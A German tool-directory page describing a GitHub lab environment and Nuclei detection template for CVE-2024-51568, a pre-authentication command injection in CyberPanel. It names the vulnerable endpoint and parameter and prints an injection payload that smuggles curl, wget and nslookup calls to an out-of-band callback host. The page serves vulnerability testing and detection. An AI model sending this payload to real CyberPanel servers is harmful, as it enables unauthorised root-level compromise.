Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template — Proof-of-Concept-Umgebung und Nuclei-Template zum Testen von CVE-2024-51568, einer Command-Injection-Schwachstelle vor der Authentifizierung in CyberPanel, die Remote-Codeausführung mit Root-Rechten ermöglicht. | Kitploit
Tools/GitHubGitHub/jsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungLabs & Praxis
GitHubjsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template

CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template

Proof-of-Concept-Umgebung und Nuclei-Template zum Testen von CVE-2024-51568, einer Command-Injection-Schwachstelle vor der Authentifizierung in CyberPanel, die Remote-Codeausführung mit Root-Rechten ermöglicht.

Repository anzeigen
113vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-51568 - CyberPanel Command Injection PoC

Eine Proof-of-Concept-Umgebung und Nuclei-Vorlage zum Testen von CVE-2024-51568, einer kritischen Pre-Authentication-Command-Injection-Schwachstelle in CyberPanel.

Schwachstellendetails

  • CVE: CVE-2024-51568
  • Schweregrad: Kritisch (CVSS 9.8)
  • Typ: Pre-Authentication-Command-Injection
  • Endpunkt: /filemanager/upload
  • Parameter: completePath
  • Auswirkung: Remote-Code-Ausführung mit Root-Rechten

Schnellstart

1. Verwundbare Umgebung starten

root@kitploit:~
cd docker/
docker-compose up -d --build

2. Prüfen, dass CyberPanel läuft

root@kitploit:~
curl -I http://localhost:8090

3. Die Schwachstelle testen

root@kitploit:~
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090

Beispielausgabe:

root@kitploit:~
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.

Funktionsweise

Die Schwachstelle

CyberPanel v2.3.4 enthält einen Command-Injection-Fehler in der Datei-Upload-Funktionalität:

  1. Endpunkt: POST /filemanager/upload
  2. Parameter: completePath in Multipart-Formulardaten
  3. Injektion: Befehle werden über ProcessUtilities.outputExecutioner() ausgeführt
  4. Umgehung: Keine Authentifizierung erforderlich dank Middleware-Bypass

Nuclei-Vorlage:

  1. Extrahiert das CSRF-Token aus der anfänglichen GET-Anfrage
  2. Sendet einen bösartigen Datei-Upload mit injiziertem Befehl in completePath
  3. Verwendet Interactsh für Out-of-Band-Erkennung (HTTP/DNS-Callbacks)
  4. Erkennt erfolgreiche Ausführung, wenn der Server die Interactsh-URL kontaktiert

Erkennungs-Payload

root@kitploit:~
/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #

Dieser Payload gewährleistet zuverlässige Erkennung über verschiedene Systemkonfigurationen hinweg.

Konfiguration

CyberPanel-Zugang

  • URL: http://localhost:8090
  • Admin: admin
  • Passwort: 1234567

Referenzen

  • Original Research
  • Metasploit Module
  • CVE Details

Sicherheitshinweis

Diese Umgebung enthält absichtlich eingebaute Schwachstellen für Sicherheitsforschung und Ausbildung:

  • NICHT in Produktion einsetzen
  • NICHT öffentlichen Netzwerken aussetzen
  • NICHT auf Systemen verwenden, die dir nicht gehören
  • NUR für autorisierte Sicherheitstests verwenden

Haftungsausschluss

Dieses Proof-of-Concept dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Die Nutzer sind dafür verantwortlich, geltende Gesetze einzuhalten und vor dem Testen eine ordnungsgemäße Autorisierung einzuholen.

Tool herunterladen